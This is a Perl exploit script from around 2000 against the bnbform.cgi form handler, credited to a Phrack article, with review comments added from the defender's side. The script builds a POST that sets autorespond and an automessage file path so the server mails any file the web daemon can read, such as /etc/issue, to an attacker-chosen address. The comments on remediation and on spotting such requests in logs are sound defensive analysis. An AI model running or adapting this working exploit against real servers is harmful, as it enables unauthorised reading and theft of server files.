#!/usr/bin/perl -w

##  bnbform.cgi exploit - discovered in Phrack55,
##  article p55-07 by the author of whisker, rain.forest.puppy.
##  The article is about Perl CGI problems, and is very
##  interesting reading - well done! This exploit will
##  mail you any file readable by the httpd daemon.
##
##  All versions below bnbform v4.0 are vulnerable.
##
## ./bnbform.pl hell.no cgi-bin me me@mail.com /etc/issue
##
##  - teleh0r@doglover.com / anno 2000 -
##        http://teleh0r.cjb.net

use strict;
use Socket;

# Overview (review notes, written from the defender's side):
# the script takes five command-line arguments, builds a single
# form-encoded POST for /<cgi-dir>/bnbform.cgi, writes it to TCP port 80
# of the target and exits without reading the reply.
#
# Per the header above, bnbform versions below v4.0 are affected, so the
# remediation is to upgrade to v4.0 or later, or to remove the CGI.
# The general lesson is that a CGI must never take a file path from a
# client-supplied form field; any such value should be checked against
# a fixed allow-list of template names on the server.
#
# What to look for: a POST to bnbform.cgi whose body carries
# autorespond=yes together with an automessage value that looks like a
# filesystem path (here "/" arrives as %2F).  Access logs usually do not
# record POST bodies, so this needs body inspection at a proxy/WAF or in
# the application's own logging.

# Require all five positional arguments; otherwise print usage and stop.
if (@ARGV < 5) {
    print("Usage: $0 <target> <cgi-dir> <name> <email> <file>\n");
    exit(1);
}

# All working variables are declared up front (file runs under strict).
my($target,$cgidir,$name,$email,$file,$length,
   $agent,$command,$sploit,$iaddr,$paddr,$proto);

# Arguments are used exactly as given; nothing here validates them.
($target,$cgidir,$name,$email,$file) = @ARGV;

# Banner echoing the request that is about to be sent.
print("\nRemote host: $target\n");
print("CGI-script: /$cgidir/bnbform.cgi\n");
print("File to retrieve: $file\n");

# Only "/" is percent-encoded in the path; $name and $email go into the
# body with no encoding at all.
$file =~ s/\//%2F/g;
# Declared Content-length: a hard-coded 186 plus the lengths of the three
# variable fields.  It is not measured from $command itself.
$length = 186 + length($name.$email.$file);
# Fixed browser-like User-Agent string; a constant value like this is a
# usable log fingerprint for this particular script.
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; # heh ;)

# Form body.  The security-relevant fields are submit_by (the address
# the reply is mailed to), autorespond=yes and automessage (the path).
# Presumably the CGI reads the automessage value as a file to send back,
# which matches the header's "mail you any file readable by the httpd
# daemon" - confirm against the bnbform source.
$command=
"name=$name&submit_by=$email&required=name&data_order=name".
"&autorespond=yes&automessage=$file&form_id=My+Test+Form";

# Complete HTTP/1.0 request as one string literal.
# NOTE(review): the header lines inside this literal are separated by
# whatever line endings this source file uses, not by explicit \015\012;
# only the send() further down appends a CRLF after the body.
$sploit=
"POST /$cgidir/bnbform.cgi HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$command";

# Resolve the target and build the socket address; the port is fixed at 80.
$iaddr = inet_aton($target)			|| die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)		|| die("Error: $!\n");
$proto = getprotobyname('tcp')			|| die("Error: $!\n");

# Plain TCP connection; the request is written once and the socket is
# closed immediately, so the server's response is never read.
socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
connect(SOCKET, $paddr)                         || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
close(SOCKET);

# The closing message is printed unconditionally after a fixed 3-second
# pause.  It says nothing about whether the server accepted the request,
# so this output is not evidence that a host is (or is not) affected.
sleep(3);
print("\nAll done - check your mail.\n");
exit(0);
